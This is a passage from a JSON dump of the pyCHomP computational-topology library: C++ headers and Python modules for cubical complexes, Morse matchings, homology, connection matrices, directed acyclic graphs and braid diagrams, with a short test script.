<pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline void\nComplexBinding(py::module &m) {\n py::class_<Complex, std::shared_ptr<Complex>>(m, \"Complex\")\n .def(\"dimension\", &Complex::dimension)\n .def(\"boundary\", &Complex::boundary)\n .def(\"coboundary\", &Complex::coboundary)\n .def(\"column\", &Complex::column)\n 
.def(\"row\", &Complex::row)\n .def(\"closure\", &Complex::closure) \n .def(\"star\", &Complex::star)\n .def(\"topstar\", &Complex::topstar)\n .def(\"__iter__\", [](Complex const& v) {\n return py::make_iterator(v.begin(), v.end());\n }, py::keep_alive<0, 1>())\n .def(\"__call__\", [](Complex const& v, Integer d) {\n return py::make_iterator(v(d).begin(), v(d).end());\n }, py::keep_alive<0, 1>())\n .def(\"__len__\", (Integer(Complex::*)(void)const)&Complex::size)\n .def(\"size\", (Integer(Complex::*)(void)const)&Complex::size)\n .def(\"size\", (Integer(Complex::*)(Integer)const)&Complex::size)\n .def(\"count\", &Complex::count);\n}\n"
},
{
"alpha_fraction": 0.6942675113677979,
"alphanum_fraction": 0.7070063948631287,
"avg_line_length": 21.428571701049805,
"blob_id": "10ae27e06bb5ace4013a3de971b61433fe20ece7",
"content_id": "7c54e5a5280fb199cb71bcaaf35b8208a0f79a34",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 157,
"license_type": "permissive",
"max_line_length": 31,
"num_lines": 7,
"path": "/tests/TestCubicalComplex.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "import chomp\nX = chomp.CubicalComplex([5,5])\nprint(len(X))\nfor cell in X:\n print(X.coordinates(cell))\n print(X.boundary(cell))\n print(X.coboundary(cell))\n"
},
{
"alpha_fraction": 0.6290076375007629,
"alphanum_fraction": 0.6534351110458374,
"avg_line_length": 16.70270347595215,
"blob_id": "6cfcbd726e0e458c78aac21927eca1fcb77b8bc9",
"content_id": "54b697975c20e1d5f6a1df775785c09c36a56f71",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 655,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 37,
"path": "/src/pychomp/_chomp/include/Homology.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// Homology.h\n/// Shaun Harker\n/// 2017-07-20\n/// MIT LICENSE\n\n#pragma once\n\n#include <memory>\n\n#include \"Integer.h\"\n#include \"Chain.h\"\n#include \"Complex.h\"\n#include \"MorseComplex.h\"\n#include \"MorseMatching.h\"\n\n/// Homology\ninline\nstd::shared_ptr<Complex> \nHomology ( std::shared_ptr<Complex> base ) {\n std::shared_ptr<Complex> next = base;\n do {\n base = next;\n next.reset( new MorseComplex ( base ) );\n } while ( next -> size() != base -> size() );\n return base;\n}\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline\nvoid HomologyBinding(py::module &m) {\n m.def(\"Homology\", &Homology);\n}\n"
},
{
"alpha_fraction": 0.592090368270874,
"alphanum_fraction": 0.6158192157745361,
"avg_line_length": 27.54838752746582,
"blob_id": "92657df2389e0abfb41133854c869ae7e0c87211",
"content_id": "57f8d32a7ea6e21caa9f5c5a588d01a0cfa3f83d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 885,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 31,
"path": "/src/pychomp/TopologicalSort.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "# TopologicalSort.py\n# MIT LICENSE 2016\n# Shaun Harker\n\ndef TopologicalSort(vertices, adjacencies):\n \"\"\"\n Topological Sort of a directed acyclic graph (reverse ordered topsort)\n Example:\n vertices = [1,2,3,4,5]\n edges = [(1,2),(2,3),(2,4),(4,5),(3,5),(1,5)]\n adjacencies = lambda v : [ j for (i,j) in edges if i == v ]\n print(TopologicalSort(vertices,adjacencies))\n \"\"\"\n result = []\n preordered = set()\n postordered = set()\n def unvisited_children(u):\n return [ w for w in adjacencies(u) if w not in preordered ]\n for root in vertices:\n if root in preordered: continue\n stack = [root]\n def visit(u): \n if u in preordered: \n if u not in postordered:\n result.append(u)\n postordered.add(u)\n else:\n preordered.add(u)\n stack.extend([u] + unvisited_children(u))\n while stack: visit(stack.pop())\n return result\n"
},
{
"alpha_fraction": 0.5517241358757019,
"alphanum_fraction": 0.6379310488700867,
"avg_line_length": 10.600000381469727,
"blob_id": "a410ed88c2e15239d259c25be22ab0e8b48d6b91",
"content_id": "ae58d4692af6286c4e6ae76552235b38170dacc6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 116,
"license_type": "permissive",
"max_line_length": 24,
"num_lines": 10,
"path": "/src/pychomp/_chomp/include/Integer.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// Integer.h\n/// Shaun Harker\n/// 2017-07-18\n/// MIT LICENSE\n\n#pragma once\n\n#include <cstdint>\n\ntypedef int64_t Integer;\n"
},
{
"alpha_fraction": 0.6188151836395264,
"alphanum_fraction": 0.6252496242523193,
"avg_line_length": 34.2109375,
"blob_id": "6d98ad883103758481a3d8bb660b2975e6b1234b",
"content_id": "c8e49c0815f8073d4af6845fe70e5451cc598611",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4507,
"license_type": "permissive",
"max_line_length": 136,
"num_lines": 128,
"path": "/src/pychomp/_chomp/include/CubicalMorseMatching.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// CubicalMorseMatching.h\n/// Shaun Harker\n/// 2018-02-16\n/// MIT LICENSE\n\n#pragma once\n\n#include <memory>\n#include <unordered_set>\n#include <vector>\n\n#include \"Integer.h\"\n#include \"Chain.h\"\n#include \"Complex.h\"\n#include \"GradedComplex.h\"\n#include \"MorseMatching.h\"\n\nclass CubicalMorseMatching : public MorseMatching {\npublic:\n /// CubicalMorseMatching\n CubicalMorseMatching ( std::shared_ptr<CubicalComplex> complex_ptr ) : complex_(complex_ptr) {\n type_size_ = complex_ -> type_size();\n graded_complex_.reset(new GradedComplex(complex_, [](Integer i){return 0;}));\n }\n\n /// CubicalMorseMatching\n CubicalMorseMatching ( std::shared_ptr<GradedComplex> graded_complex_ptr ) : graded_complex_(graded_complex_ptr) {\n complex_ = std::dynamic_pointer_cast<CubicalComplex>(graded_complex_->complex());\n if ( not complex_ ) {\n throw std::invalid_argument(\"CubicalMorseMatching must be constructed with a Cubical Complex\");\n }\n type_size_ = complex_ -> type_size();\n Integer D = complex_ -> dimension();\n Integer idx = 0;\n begin_.resize(D+2);\n for ( Integer d = 0; d <= D; ++ d) {\n begin_[d] = idx;\n for ( auto v : (*complex_)(d) ) { // TODO: skip fringe cells\n if ( ! complex_ -> rightfringe(v) ) {\n if ( mate(v) == v ) { \n reindex_.push_back({v,idx});\n ++idx;\n }\n }\n }\n }\n begin_[D+1] = idx;\n }\n\n /// critical_cells\n std::pair<BeginType const&,ReindexType const&>\n critical_cells ( void ) const {\n return {begin_,reindex_};\n }\n\n /// mate\n Integer\n mate ( Integer x ) const { \n return mate_(x, complex_ -> dimension());\n }\n\n /// priority\n Integer\n priority ( Integer x ) const { \n return type_size_ - x % type_size_;\n }\n\nprivate:\n uint64_t type_size_;\n std::shared_ptr<GradedComplex> graded_complex_;\n std::shared_ptr<CubicalComplex> complex_;\n BeginType begin_;\n ReindexType reindex_;\n\n // def mate(cell, D):\n // for d in range(0, D):\n // if cell has extent in dimension d:\n // left = leftboundary(cell, d)\n // if value(left) == value(cell):\n // if left == mate(left, d):\n // return left\n // else:\n // right = rightcoboundary(cell, d)\n // if value(right) == value(cell):\n // if right == mate(right, d):\n // return right\n // return cell \n // Note: should the complicated formulas (which are also found in CubicalComplex.h not be repeated here?\n // Note: the reason for the \"fringe\" check preventing mating is that otherwise it is possible to \n // end up with a cycle \n // TODO: Furnish a proof of correctness and complexity that this cannot produce cycles.\n Integer mate_ ( Integer cell, Integer D ) const {\n //bool fringe = complex_ -> rightfringe(cell);\n if ( complex_ -> rightfringe(cell) ) return cell; // MAYBE\n //Integer mincoords = complex_ -> mincoords(cell); // TODO: optimize to compute this as it loops through d rather than demanding all\n //Integer maxcoords = complex_ -> maxcoords(cell); // TODO: optimize to compute this as it loops through d rather than demanding all\n Integer shape = complex_ -> cell_shape(cell);\n Integer position = cell % complex_ -> type_size();\n if ( position == complex_ -> type_size() - 1 ) return cell; // Break cycles\n for ( Integer d = 0, bit = 1; d < D; ++ d, bit <<= 1L ) {\n // If on right fringe for last dimension, prevent mating with left boundary\n if ( (d == D-1) && (position + complex_ -> PV()[d] >= complex_ -> type_size()) ) break;\n //if ( fringe && (mincoords & bit) ) continue; // Todo -- is this the best\n //if ( bit & maxcoords ) continue; // Don't connect fringe to acyclic 
part\n Integer type_offset = complex_ -> type_size() * complex_ -> TS() [ shape ^ bit ];\n Integer proposed_mate = position + type_offset;\n if ( graded_complex_ -> value(proposed_mate) == graded_complex_ -> value(cell) && proposed_mate == mate_(proposed_mate, d) ) { \n return proposed_mate;\n }\n }\n return cell;\n }\n};\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline void\nCubicalMorseMatchingBinding(py::module &m) {\n py::class_<CubicalMorseMatching, std::shared_ptr<CubicalMorseMatching>>(m, \"CubicalMorseMatching\")\n .def(py::init<std::shared_ptr<CubicalComplex>>())\n .def(py::init<std::shared_ptr<GradedComplex>>()) \n .def(\"mate\", &CubicalMorseMatching::mate)\n .def(\"priority\", &CubicalMorseMatching::priority);\n}\n"
},
{
"alpha_fraction": 0.516846776008606,
"alphanum_fraction": 0.516846776008606,
"avg_line_length": 33.9555549621582,
"blob_id": "2440581f7b818104e00104e3662ea6f3fd849452",
"content_id": "76ee872b8df145cfde9de92206ff9899ab33985c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1573,
"license_type": "permissive",
"max_line_length": 134,
"num_lines": 45,
"path": "/src/pychomp/DrawGradedComplex.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "# DrawGradedComplex.py\n\nfrom collections import Counter\nimport graphviz\n\nclass DrawGradedComplex:\n def __dir__(self):\n return list(self.__dict__.keys()) + dir(self._a)\n def __getattr__(self, attr):\n return getattr(self._a,attr)\n def __init__(self, a, poset):\n self._a = a\n self.poset = poset\n # Compute preimage\n self.preimage_ = {}\n for v in a.complex():\n val = a.value(v)\n if val not in self.preimage_:\n self.preimage_[val] = set()\n self.preimage_[val].add(v)\n def preimage(self, val):\n if val in self.preimage_:\n return self.preimage_[val]\n else:\n return set()\n def graphviz (self):\n \"\"\" Return a graphviz string describing the graph and its labels \"\"\"\n gv = 'digraph {\\n'\n indices = { v : str(k) for k,v in enumerate(self.poset.vertices())}\n counts = self._a.count()\n #print(counts)\n def vertex_label(v):\n if v in counts:\n return str(v) + \" : \" + str(tuple(counts[v]))\n else:\n return \" \"\n for v in self.poset.vertices(): \n gv += indices[v] + '[label=\"' + vertex_label(v) + ('\", style=filled, fillcolor=cyan];\\n' if self.preimage(v) else '\"];\\n')\n for v in self.poset.vertices(): \n for u in self.poset.children(v):\n gv += indices[v] + ' -> ' + indices[u] + ';\\n'\n return gv + '}\\n'\n\n def _repr_svg_(self):\n return graphviz.Source(self.graphviz())._repr_svg_()\n"
},
{
"alpha_fraction": 0.652466356754303,
"alphanum_fraction": 0.6569506525993347,
"avg_line_length": 43.5,
"blob_id": "006eb1589a685b547916948dceeb6920198afa1d",
"content_id": "9be12a48d6d8d1e63111722bc9bc3aa8ac38fdfd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 892,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 20,
"path": "/src/pychomp/CondensationGraph.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "### CondensationGraph.py\n### MIT LICENSE 2016 Shaun Harker\n\nfrom pychomp.StronglyConnectedComponents import *\nfrom pychomp.DirectedAcyclicGraph import *\nfrom collections import defaultdict\n\ndef CondensationGraph(vertices, adjacencies):\n components = StronglyConnectedComponents(vertices, adjacencies)\n mapping = defaultdict(int, { u : i for i, component in enumerate(components) for u in component })\n scc_dag = DirectedAcyclicGraph()\n for i, component in enumerate(components):\n #print(\"Examining SCC \" + str(i))\n scc_dag.add_vertex(i)\n for u in component:\n #print(\"Examining adjacencies of vertex \" + str(u) + \" in SCC \" + str(i) )\n for v in adjacencies(u):\n #print(\"Adjacency \" + str(v) + \" belongs to SCC \" + str(mapping[v]) )\n if i != mapping[v]: scc_dag.add_edge(i,mapping[v])\n return scc_dag, mapping\n\n\n"
},
{
"alpha_fraction": 0.6772727370262146,
"alphanum_fraction": 0.689393937587738,
"avg_line_length": 22.571428298950195,
"blob_id": "77a727aca8bd5b8aab9d2243b47736f8624e54e9",
"content_id": "97bc847814fc173a51dbb4426b9492d1b4e384bf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1320,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 56,
"path": "/src/pychomp/_chomp/include/ConnectionMatrix.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// ConnectionMatrix.h\n/// Shaun Harker\n/// 2017-07-20\n/// MIT LICENSE\n\n#pragma once\n\n#include <memory>\n\n#include \"Integer.h\"\n#include \"Chain.h\"\n#include \"Complex.h\"\n#include \"MorseComplex.h\"\n#include \"MorseMatching.h\"\n#include \"GradedComplex.h\"\n#include \"MorseGradedComplex.h\"\n\n/// ConnectionMatrix\ninline\nstd::shared_ptr<GradedComplex> \nConnectionMatrix ( std::shared_ptr<GradedComplex> base ) {\n std::shared_ptr<GradedComplex> next = base;\n do {\n base = next;\n next = MorseGradedComplex(base);\n } while ( next -> complex() -> size() != base -> complex() -> size() );\n return base;\n}\n\n/// ConnectionMatrix\ninline\nstd::vector<std::shared_ptr<GradedComplex>>\nConnectionMatrixTower ( std::shared_ptr<GradedComplex> base ) {\n std::vector<std::shared_ptr<GradedComplex>> tower;\n std::shared_ptr<GradedComplex> next = base;\n std::shared_ptr<GradedComplex> last;\n do {\n tower.push_back(next);\n last = tower.back();\n next = MorseGradedComplex(last);\n } while ( next -> complex() -> size() != last -> complex() -> size() );\n return tower;\n}\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline\nvoid ConnectionMatrixBinding(py::module &m) {\n m.def(\"ConnectionMatrix\", &ConnectionMatrix);\n m.def(\"ConnectionMatrixTower\", &ConnectionMatrixTower);\n\n}\n"
},
{
"alpha_fraction": 0.5724269151687622,
"alphanum_fraction": 0.5902159810066223,
"avg_line_length": 25.25,
"blob_id": "185f6f385d0a622b9b5af22f59ef5ccafde38065",
"content_id": "c368febcaa5ffbb3a014bce123a390eee5555ad9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1574,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 60,
"path": "/src/pychomp/_chomp/include/hash.hpp",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// hash.hpp\n/// Shaun Harker\n/// 2018-02-02\n\n/// Add hash support\n\n#pragma once\n\n#include <utility>\n#include <set>\n\nnamespace pychomp {\n\n std::size_t hash_value ( std::size_t t );\n template <class A, class B> std::size_t hash_value(std::pair<A, B> const& v);\n template <class K, class C, class A> std::size_t hash_value ( std::set<K, C, A> const& p );\n template <typename T> void hash_combine (std::size_t & seed, const T& val);\n\n inline std::size_t\n hash_value ( std::size_t t ) {\n return std::hash<std::size_t>()(t);\n }\n\n template <class A, class B>\n std::size_t hash_value(std::pair<A, B> const& v) {\n std::size_t seed = 0;\n pychomp::hash_combine(seed, v.first);\n pychomp::hash_combine(seed, v.second);\n return seed;\n }\n\n template <class T>\n std::size_t\n hash_value ( std::vector<T> const& p ) {\n std::size_t seed = 0;\n for ( auto const& item : p ) pychomp::hash_combine( seed, item);\n return seed;\n }\n\n template <class K, class C, class A>\n std::size_t\n hash_value ( std::set<K, C, A> const& p ) {\n std::size_t seed = 0;\n for ( auto const& item : p ) pychomp::hash_combine( seed, item);\n return seed;\n }\n\n template <typename T>\n void hash_combine (std::size_t & seed, const T& val) {\n seed ^= hash_value(val) + 0x9e3779b9 // 7f4a7c16 // magic number hex digits of (\\sqrt{5}-1/2)\n + (seed<<6) + (seed>>2);\n }\n\n template <class T> \n struct hash : public std::unary_function<T const&, std::size_t> {\n std::size_t operator()(T const& val) const {\n return hash_value(val);\n }\n };\n}"
},
{
"alpha_fraction": 0.5240458846092224,
"alphanum_fraction": 0.5262707471847534,
"avg_line_length": 39.29655075073242,
"blob_id": "1e2b01143c6a1fe4727dfd12dd1bd253b885e47b",
"content_id": "8555645f60757f5eaa8f9068db8d25217437f280",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5843,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 145,
"path": "/src/pychomp/DirectedAcyclicGraph.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "### DirectedAcyclicGraph.py\n### MIT LICENSE 2016 Shaun Harker\n\nimport subprocess, copy, json, graphviz, sys\nfrom collections import defaultdict\n\nfrom pychomp.TopologicalSort import *\n\n# TODO: don't silently fail if given a non-DAG\n\nclass DirectedAcyclicGraph:\n \"\"\"\n Represents a directed acyclic graph\n \"\"\"\n def __init__(self):\n \"\"\" Initialize an empty graph object \"\"\"\n self.vertices_ = set()\n self.adjacency_lists_ = {}\n self.vertex_labels_ = {}\n self.edge_labels_ = {}\n def add_vertex(self, v, label = ''):\n \"\"\" Add the vertex v to the graph and associate a label if one is given \"\"\"\n if v in self.vertices_: return\n self.vertices_.add(v)\n self.adjacency_lists_[v] = set ()\n self.vertex_labels_[v] = label\n self.edge_labels_[v] = {}\n def add_edge(self, u, v, label = ''):\n \"\"\" Add the edge u -> v to the graph and associate a label if one is given \"\"\"\n #print(\"Adding DAG edge (\" + str(u) + \", \" + str(v) + \")\")\n self.add_vertex(u)\n self.add_vertex(v)\n self.adjacency_lists_[u].add(v)\n self.edge_labels_[u][v] = label\n def remove_edge(self, u, v):\n \"\"\" Remove the edge u -> v from the graph \"\"\"\n self.adjacency_lists_[u].discard(v)\n self.edge_labels_[u].pop(v, None)\n def vertex_label(self, v):\n \"\"\" Return the label on the vertex v \"\"\"\n return self.vertex_labels_[v]\n def get_vertex_from_label(self, label):\n \"\"\" Return the vertex v with label 'label'. Error if non-unique. \"\"\"\n vertices = [ v for v in self.vertices_ if self.vertex_label(v) == label ]\n N = len(vertices)\n if N == 1:\n return vertices[0]\n elif N==0:\n return None\n elif N>1:\n raise ValueError(\"Non-unique vertex labels.\")\n def edge_label(self, u, v):\n \"\"\" Return the label on the edge u -> v \"\"\"\n return self.edge_labels_[u][v]\n def vertices(self):\n \"\"\" Return the set of vertices in the graph \"\"\"\n return self.vertices_\n def edges(self):\n \"\"\" Return a complete list of directed edges (u,v) in the graph \"\"\"\n return [(u,v) for u in self.vertices() for v in self.adjacencies(u)]\n def adjacencies(self, v):\n \"\"\" Return the set of adjacencies of v, i.e. { u : v -> u } \"\"\"\n return self.adjacency_lists_[v]\n def clone(self):\n \"\"\" Return a copy of this graph \"\"\"\n return copy.deepcopy(self)\n def transpose(self):\n \"\"\" Return a new graph with edge direction reversed. 
\"\"\"\n G = DirectedAcyclicGraph ()\n for v in self.vertices(): G.add_vertex(v,self.vertex_label(v))\n for (u,v) in self.edges(): G.add_edge(v,u,self.edge_label(u,v))\n return G\n def descendants(self, v):\n # Find vertices reachable from from v\n reachable = set([v])\n workstack = [v]\n while workstack:\n u = workstack.pop()\n for w in self.adjacencies(u):\n if w not in reachable:\n workstack.append(w)\n reachable.add(w)\n return reachable \n def transitive_closure(self):\n TS = TopologicalSort(self.vertices(), self.adjacencies)\n result = DirectedAcyclicGraph()\n for v in self.vertices():\n result.add_vertex(v) \n for v in self.vertices():\n # Find vertices reachable from from v\n reachable = set()\n reachable.add(v)\n for u in reversed(TS):\n if u in reachable:\n for w in self.adjacencies(u):\n reachable.add(w)\n for u in reachable:\n if u != v:\n result.add_edge(v, u)\n return result\n # \"\"\" Return a new graph which is the transitive closure \"\"\"\n # G = self.clone ()\n # #print(\"Transitive closure: n = \" + str(len(self.vertices())) )\n # for w in self.vertices():\n # for u in self.vertices():\n # for v in self.vertices():\n # if w in G.adjacencies(u) and v in G.adjacencies(w):\n # G . add_edge(u,v)\n # return G\n def transitive_reduction(self):\n \"\"\" Return a new graph which is the transitive reduction \"\"\"\n TS = TopologicalSort(self.vertices(), self.adjacencies)\n result = DirectedAcyclicGraph()\n for v in self.vertices():\n result.add_vertex(v) \n for v in self.vertices():\n # Find single-source longest paths from v\n lp = { u : -1 for u in self.vertices() }\n lp[v] = 0\n for u in reversed(TS):\n val = lp[u]\n if val >= 0:\n for w in self.adjacencies(u):\n if u != w:\n lp[w] = max(val + 1, lp[w])\n for u in [ w for w in lp if lp[w] == 1 ]:\n result.add_edge(v, u)\n return result\n\n # TC = self.transitive_closure ()\n # G = self.clone ()\n # for (u,v) in TC.edges():\n # for w in TC.adjacencies(v):\n # G.remove_edge(u,w)\n # return G\n def graphviz(self):\n \"\"\" Return a graphviz string describing the graph and its labels \"\"\"\n gv = 'digraph {\\n'\n indices = { v : str(k) for k,v in enumerate(self.vertices())}\n #for v in self.vertices(): gv += indices[v] + ';\\n' #+ '[label=\"' + self.vertex_label(v) + '\"];\\n'\n for v in self.vertices(): gv += indices[v] + '[label=\"' + self.vertex_label(v) + '\"];\\n'\n for (u,v) in self.edges(): gv += indices[u] + ' -> ' + indices[v] + ' [label=\"' + self.edge_label(u,v) + '\"];\\n'\n return gv + '}\\n'\n def _repr_svg_(self):\n return graphviz.Source(self.graphviz())._repr_svg_()\n"
},
{
"alpha_fraction": 0.5832333564758301,
"alphanum_fraction": 0.5964340567588806,
"avg_line_length": 35.917720794677734,
"blob_id": "133084437676122b864830178de1376bb283c02b",
"content_id": "0e3dfb96f0eb364e13041a4e24971f442f982ca0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5833,
"license_type": "permissive",
"max_line_length": 149,
"num_lines": 158,
"path": "/src/pychomp/Braids.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "### Braids.py\n### MIT LICENSE 2016 Shaun Harker\n\nfrom pychomp._chomp import *\n\nfrom collections import defaultdict\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nclass BraidDiagram:\n def __init__(self, braid_skeleton):\n \"\"\"\n Inputs:\n braid_skeleton : a list of lists such that \n braid_skeleton[i][j] gives the value of strand i at position j\n Outputs:\n braid_specification: a tuple (n, m, x, pi) \n where n : number of strands \n m : number of waypoints \n x(i,j) means the value of strand i at position j\n pi is a permutation such that x(i,j+m) == x(pi(i),j)\n \"\"\"\n self.n = len(braid_skeleton)\n self.m = len(braid_skeleton[0]) - 1\n self.permute_ = {}\n for i in range(0,self.n):\n for j in range(0,self.n):\n if braid_skeleton[i][self.m] == braid_skeleton[j][0]:\n self.permute_[i] = j\n self.braid_skeleton_ = braid_skeleton\n self.min_ = min([ min(braid_skeleton[i]) for i in range(0,len(braid_skeleton)) ])\n self.max_ = max([ max(braid_skeleton[i]) for i in range(0,len(braid_skeleton)) ])\n # convert\n self.thresholds = [ [float(\"-inf\")] + sorted( [self.braid_skeleton_[i][j] for i in range(0,self.n)] ) + [float(\"inf\")] for j in range(0,self.m) ]\n for j in range(0,self.m):\n self.thresholds[j][0] = self.thresholds[j][1] - 1.0\n self.thresholds[j][-1] = self.thresholds[j][-2] + 1.0\n\n\n def __call__(self, i, j):\n \"\"\"\n Return the height of strand i at position j\n \"\"\"\n return self.braid_skeleton_[i][j]\n\n def pi(self,i):\n \"\"\"\n pi is a permutation such that x(i,j+m) == x(pi(i),j)\n \"\"\"\n return self.permute_[i]\n\n def lap(self, coordinates):\n \"\"\"\n Compute the lap number for a domain (given by a point in it)\n \"\"\"\n #midpoints = [ sum(domain.bounds()[j]) / 2.0 for j in (list(range(0,self.m)) + [0]) ] \n \n # on right fringe, give a big lap number\n if any( coord == self.n + 1 for coord in coordinates ):\n return 2 * self.n * self.m\n\n # otherwise, do the legitimate computation:\n midpoints = [ (self.thresholds[j][i+1] + self.thresholds[j][i])/2.0 for j,i in list(enumerate(coordinates)) + [(0,coordinates[0])]]\n return sum(self(i,j) <= midpoints[j] and self(i,j+1) >= midpoints[j+1] for j in range(0,self.m) for i in range(0,self.n))\n\n def draw(self, domain=None):\n x = np.arange(self.m+1)\n for i in range(0,self.n):\n plt.plot(x, [self(i,j) for j in range(0,self.m+1)])\n if domain:\n def f(x):\n if x[0] == -float(\"inf\") and x[1] == -float(\"inf\"):\n return self.min_ - 1.0\n if x[0] == float(\"inf\") and x[1] == float(\"inf\"):\n return self.max_ + 1.0\n if x[0] == -float(\"inf\"):\n return x[1] - .5\n if x[1] == float(\"inf\"):\n return x[0] + .5\n return (x[0] + x[1]) / 2.0\n strand = [ f(domain.bounds()[d]) for d in range(0, self.m) ]\n strand = strand + [strand[0]]\n plt.plot(x, strand, '--', color='b',)\n plt.show()\n\n def __repr__(self):\n self.draw()\n return \"Braid Diagram\"\n\ndef BraidComplex( braid_diagram ):\n \"\"\"\n Overview:\n Given a specification for a \"braids\" dynamical system,\n return the associated cubical complex and flow graph.\n \"\"\"\n\n # Unpack the input\n n = braid_diagram.n\n m = braid_diagram.m\n x = lambda i,j : braid_diagram(i,j)\n pi = lambda i : braid_diagram.pi(i)\n\n # Create the associated cubical complex\n\n thresholds = [ [float(\"-inf\")] + sorted( [x(i,j) for i in range(0,n)] ) + [float(\"inf\")] for j in range(0,m) ]\n # complex = CubicalComplex(CubicalGrid(thresholds))\n complex = CubicalComplex([ len(thresholds[j]) for j in range(0,m)])\n \n #lap = lambda x : 
braid_diagram.lap(complex.coordinates(x))\n\n lap_dict = {}\n def lap(x):\n if x not in lap_dict:\n lap_dict[x] = braid_diagram.lap(complex.coordinates(x))\n return lap_dict[x]\n\n # for x in complex(complex.dimension()):\n # print( str(x) + \" has coordinates \" + str(complex.coordinates(x)) + \" and lap number \" + str(lap(x)))\n\n # Construct the domains\n # domains = [cell for cell in complex.cells() if cell.dimension() == m]\n # walls = [cell for cell in complex.cells() if cell.dimension() == m-1]\n\n domains = [cell for cell in complex(m)]\n walls = [cell for cell in complex(m-1)]\n\n # Construct the edge set\n edges = defaultdict(set)\n for wall in walls:\n # A wall can have 1 adjacent domain if it is off at infinity\n if len(complex.coboundary({wall})) == 1: continue\n # Otherwise, it has precisely 2 adjacent domains\n [u, v] = complex.coboundary({wall})\n if lap(u) <= lap(v):\n edges[v].add(u)\n if lap(u) >= lap(v):\n edges[u].add(v)\n\n # Identify collapsed strands\n collapsed_strands = [ i for i in range(0,n) if pi(i) == i ]\n\n #collapsed_vertices = [ CubicalCell([ [ x(i,j), x(i,j) ] for j in range(0,m) ]) for i in collapsed_strands ]\n collapsed_vertices_coords = [ [ braid_diagram.thresholds[j].index(braid_diagram(i,j)) for j in range(0,m) ] for i in collapsed_strands]\n collapsed_vertices = [ complex.cell_index(coordinates, 0) for coordinates in collapsed_vertices_coords ]\n\n # Connect all cubes in the star of any collapsed strand\n for v in collapsed_vertices:\n #print(\"collapsed vertex \" + str(v) + \" has coordinates \" + str(complex.coordinates(v)) + \" and shape \" + str(complex.cell_shape(v)))\n #surrounding_walls = [ cell for cell in star(v) if cell.dimension() == m-1 ]\n surrounding_walls = [ cell for cell in complex.star({v}) if cell >= walls[0] and cell <= walls[-1] ]\n\n for wall in surrounding_walls:\n if len(complex.coboundary({wall})) == 1: continue\n [u, v] = complex.coboundary({wall})\n edges[u].add(v)\n edges[v].add(u)\n\n return (complex, lambda v : edges[v] )\n"
},
{
"alpha_fraction": 0.6530736684799194,
"alphanum_fraction": 0.662203311920166,
"avg_line_length": 30.596153259277344,
"blob_id": "c9f450eff485fe10ea717a9eff033dfd0acb239e",
"content_id": "c68348bb697ecf001db2d6a162528ea30a3f89e0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1643,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 52,
"path": "/src/pychomp/_chomp/include/Iterator.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
